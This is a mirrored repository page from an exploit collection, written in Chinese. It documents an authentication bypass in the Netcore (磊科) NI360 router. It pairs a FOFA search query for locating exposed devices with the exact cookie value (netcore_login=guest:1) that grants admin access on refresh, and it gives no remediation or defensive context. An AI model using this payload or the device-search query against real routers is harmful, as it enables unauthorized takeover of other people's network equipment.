admin/Awesome-POC
1
0
Fork 0
mirror of https://github.com/Threekiii/Awesome-POC.git synced 2025-11-08 20:36:14 +00:00
Code Issues Packages Projects Releases Wiki Activity
Awesome-POC/network-device/磊科 NI360路由器 认证绕过漏洞.md

29 lines
512 B
Markdown
Raw Normal View History

update gitbook
2022-02-20 16:14:31 +08:00
# 磊科 NI360路由器 认证绕过漏洞
## 漏洞描述
磊科 NI360路由器 存在认证绕过漏洞通过添加特定的Cookie字段获取后台权限
## 漏洞影响
```
磊科 NI360路由器
```
## FOFA
```
title="Netcore"
```
## 漏洞描述
登录页面如下
![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202110949810.png)
添加 Cookie字段 : **netcore_login=guest:1**
刷新后登录后台
![](https://typora-1308934770.cos.ap-beijing.myqcloud.com/202202110949667.png)
Reference in New Issue Copy Permalink